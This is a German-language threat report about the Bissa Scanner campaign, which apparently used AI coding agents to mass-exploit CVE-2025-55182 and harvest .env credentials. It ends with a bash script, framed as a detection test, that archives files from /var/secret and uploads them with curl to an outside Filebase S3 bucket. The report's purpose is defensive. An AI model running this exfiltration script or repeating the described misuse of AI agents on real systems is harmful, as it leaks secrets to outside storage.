SOC Prime Bias: Kritisch

24 Apr 2026 15:19 UTC
newspaper icon Der DFIR-Bericht

Bissa Scanner Offengelegt: KI-unterstützte Massen-Ausbeutung und Anmeldeinformationen-Erntung

Author Photo
SOC Prime Team linkedin icon Folgen
Bissa Scanner Offengelegt: KI-unterstützte Massen-Ausbeutung und Anmeldeinformationen-Erntung
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Zusammenfassung

Ein exponierter Server enthüllte eine groß angelegte Operation, die die Bissa-Scanner-Plattform, Claude Code und OpenClaw verwendete, um die Ausnutzung von internetzugänglichen Zielen über eine React2Shell-Sicherheitslücke (CVE‑2025‑55182) zu automatisieren. Die Kampagne sammelte Millionen von .env-Dateien, die hochwertige Zugangsdaten von KI-, Cloud-, Zahlungs- und Messaging-Diensten enthielten. Gesammelte Daten wurden in einem öffentlichen S3-Bucket auf Filebase für die weitere Nutzung hochgeladen. Die Operation zielte auf Organisationen in den Bereichen Finanzen, Kryptowährung und Einzelhandel ab.

Untersuchung

Analysten erholten sich über 13.000 Dateien, die den Workflow für Scannen, Ausnutzen, Validieren und Priorisieren von Opferumgebungen zeigen. Protokolle bestätigten mehr als 900 erfolgreiche Kompromittierungen unter Verwendung des React2Shell-Exploits. Telegram-Bots wurden für Echtzeit-Benachrichtigungen verwendet, die jeden Treffer mit Opferdetails verlinkten. Der Scanner enthielt auch ein Modul für eine WordPress-W3-Total-Cache-Schwachstelle (CVE‑2025‑9501), obwohl keine erfolgreiche Ausnutzung beobachtet wurde.

Abmilderung

Patchen Sie anfällige Anwendungen und Frameworks umgehend, insbesondere die React2Shell- und WordPress-W3-Total-Cache-Komponenten. Verlegen Sie Geheimnisse aus .env-Dateien in dedizierte Geheimnis-Manager und rotieren Sie regelmäßig Zugangsdaten. Härten Sie den Zugriff auf Cloud-Metadaten und erzwingen Sie RBAC mit minimalen Rechten. Überwachen Sie den ausgehenden Datenverkehr, um unbefugte Uploads zu externen Speicherdiensten zu erkennen.

Reaktion

Implementieren Sie Erkennungsregeln zur Ausnutzung von CVE‑2025‑55182 und unbefugten S3-Uploads. Blockieren Sie bekannte bösartige Domains und Telegram-Bot-Kommunikationen. Führen Sie eine forensische Analyse der kompromittierten Hosts durch, um verbliebene Nutzlasten zu lokalisieren und zu entfernen. Benachrichtigen Sie betroffene Benutzer und rotieren Sie sofort jegliche durchgesickerten Zugangsdaten.

"graph TB %% Class definitions classDef technique fill:#ffcc99 classDef tool fill:#cccccc classDef action fill:#99ccff classDef operator fill:#ff9900 %% Nodes tool_bissa_scanner["<b>Werkzeug</b> – <b>Name</b>: Bissa-Scanner<br/><b>Zweck</b>: Führen Sie massives aktives Scannen durch, indem Ziel-Feeds verwendet werden"] class tool_bissa_scanner tool tech_T1595_002["<b>Technik</b> – <b>T1595.002 Aktives Scannen: Schwachstellen-Scannen</b><br/><b>Beschreibung</b>: Scannt internetzugängliche Hosts, um anfällige Dienste zu finden"] class tech_T1595_002 technique tech_T1190["<b>Technik</b> – <b>T1190 Öffentlich zugängliche Anwendung ausnutzen</b><br/><b>Beschreibung</b>: Nutzt anfällige Webanwendungen aus, um ersten Zugriff zu erhalten"] class tech_T1190 technique tool_react2shell["<b>Werkzeug</b> – <b>Name</b>: React2Shell (CVEu20112025u201155182)<br/><b>Funktion</b>: Bietet Remote-Codeausführung über einen gestalteten React-Nutzlast"] class tool_react2shell tool tech_T1210["<b>Technik</b> – <b>T1210 Ausnutzung von Remote-Diensten</b><br/><b>Beschreibung</b>: Führt Nutzlast auf entfernten Diensten aus, um Codeausführung zu erhalten"] class tech_T1210 technique tech_T1211["<b>Technik</b> – <b>T1211 Ausnutzung zur Umgehung der Verteidigung</b><br/><b>Beschreibung</b>: Verwendet Schwachstellen, um Verteidigungen zu umgehen und verborgen zu bleiben"] class tech_T1211 technique tech_T1552_001["<b>Technik</b> – <b>T1552.001 Ungesicherte Zugangsdaten: Zugangsdaten in Dateien</b><br/><b>Beschreibung</b>: Erntet Zugangsdaten, die in Konfigurationsdateien wie .env gespeichert sind"] class tech_T1552_001 technique tech_T1119["<b>Technik</b> – <b>T1119 Automatisierte Sammlung</b><br/><b>Beschreibung</b>: Automatisiert die Validierung, Priorisierung und Batching gesammelter Daten zur Exfiltration"] class tech_T1119 technique tech_T1102_002["<b>Technik</b> – <b>T1102.002 Webdienst: Bidirektionale Kommunikation</b><br/><b>Beschreibung</b>: Verwendet Webdienste (Telegram-Bots), um Befehle und Daten auszutauschen"] class tech_T1102_002 technique tool_telegram_bot["<b>Werkzeug</b> – <b>Name</b>: Telegram-Bots @bissapwned_bot, @bissa_scan_bot<br/><b>Zweck</b>: Befehls- und Kontrollkanal"] class tool_telegram_bot tool tech_T1567_002["<b>Technik</b> – <b>T1567.002 Exfiltration über Webdienst: Exfiltration zu Cloud-Speicher</b><br/><b>Beschreibung</b>: Läd gestohlene Archive über Webdienst zu Cloud-Speicher hoch"] class tech_T1567_002 technique tool_filebase_bucket["<b>Werkzeug</b> – <b>Name</b>: Filebase S3u2011kompatibler Bucket (bissapromax)<br/><b>Zweck</b>: Speichert exfiltrierte Zugangsdatenarchive"] class tool_filebase_bucket tool tech_T1537["<b>Technik</b> – <b>T1537 Datenübertragung zu Cloud-Konto</b><br/><b>Beschreibung</b>: Verschiebt Daten zu einem vom Angreifer kontrollierten Cloud-Konto zur späteren Abholung"] class tech_T1537 technique tech_T1068["<b>Technik</b> – <b>T1068 Ausnutzung zur Privilegienerweiterung</b><br/><b>Beschreibung</b>: Nutzt geerntete Zugangsdaten, um höhere Privilegien und seitliche Bewegung zu erlangen"] class tech_T1068 technique %% Connections tool_bissa_scanner –>|führt aus| tech_T1595_002 tech_T1595_002 –>|identifiziert anfällige Dienste| tech_T1190 tech_T1190 –>|verwendet| tool_react2shell tool_react2shell –>|liefert Nutzlast an| tech_T1210 tech_T1210 –>|ermöglicht| tech_T1211 tech_T1211 –>|erlaubt| tech_T1552_001 tech_T1552_001 –>|füttert in| tech_T1119 tech_T1119 –>|sendet Daten über| tech_T1102_002 tech_T1102_002 –>|implementiert durch| tool_telegram_bot tech_T1102_002 –>|exfiltriert zu| tech_T1567_002 tech_T1567_002 –>|speichert in| tool_filebase_bucket tool_filebase_bucket –>|ermöglicht| tech_T1537 tech_T1537 –>|unterstützt| tech_T1068 "

Angriffsverlauf

Ausführungssimulation

Voraussetzung: Der Telemetrie- und Basislinien-Vorabcheck muss bestanden sein.

  • Angriffsnarrativ & Befehle:
    Der Angreifer hat eine Reihe vertraulicher Dokumente aus /var/secret/geerntet. Um eine Entdeckung zu vermeiden, archivieren sie die Daten zuerst in einer passwortgeschützten ZIP-Datei und verwenden dann curl , um das Archiv direkt an den Filebase S3-Endpunkt über den Unternehmens-Forward-Proxy hochzuladen. Der Proxy protokolliert die vollständige Anforderungs-URL, die mit der Erkennungsregel übereinstimmt.

  • Regressionstest-Skript:

    #!/usr/bin/env bash
set -euo pipefail

# 1️⃣ Stufe Daten (T1074)
STAGE_DIR="/tmp/staged_data"
mkdir -p "$STAGE_DIR"
cp -r /var/secret/* "$STAGE_DIR/"

# 2️⃣ Archive Daten (T1560.001) – passwortgeschütztes ZIP
ARCHIVE="/tmp/exfil_archive.zip"
ZIP_PASSWORD="P@ssw0rd!"
zip -r -P "$ZIP_PASSWORD" "$ARCHIVE" "$STAGE_DIR" > /dev/null

# 3️⃣ Exfiltration über Filebase S3-Endpunkt (T1020)
# Angenommen, der Proxy ist erreichbar unter http://proxy.company.local:3128
FILEBASE_URL="https://s3.filebase.com/mybucket/exfil_archive.zip"
curl -x http://proxy.company.local:3128 
     -T "$ARCHIVE" 
     -H "Host: s3.filebase.com" 
     -H "User-Agent: Mozilla/5.0" 
     "$FILEBASE_URL" 
     --silent --output /dev/null

echo "Exfiltrationsversuch abgeschlossen."

  • Bereinigungskommandos:

    # Entfernen Sie vorbereitete Dateien und Archiv
rm -rf /tmp/staged_data /tmp/exfil_archive.zip

# (Optional) Leeren Sie Proxy-Verbindungen, falls erforderlich
# Für Squid: squid -k rotate
echo "Bereinigung abgeschlossen."

Treten Sie der Detection as Code-Plattform von SOC Prime bei um die Sichtbarkeit der für Ihr Unternehmen relevantesten Bedrohungen zu verbessern. Um Ihnen den Einstieg zu erleichtern und unmittelbaren Mehrwert zu erzielen, buchen Sie jetzt ein Treffen mit den Experten von SOC Prime.

Kostenlos beitreten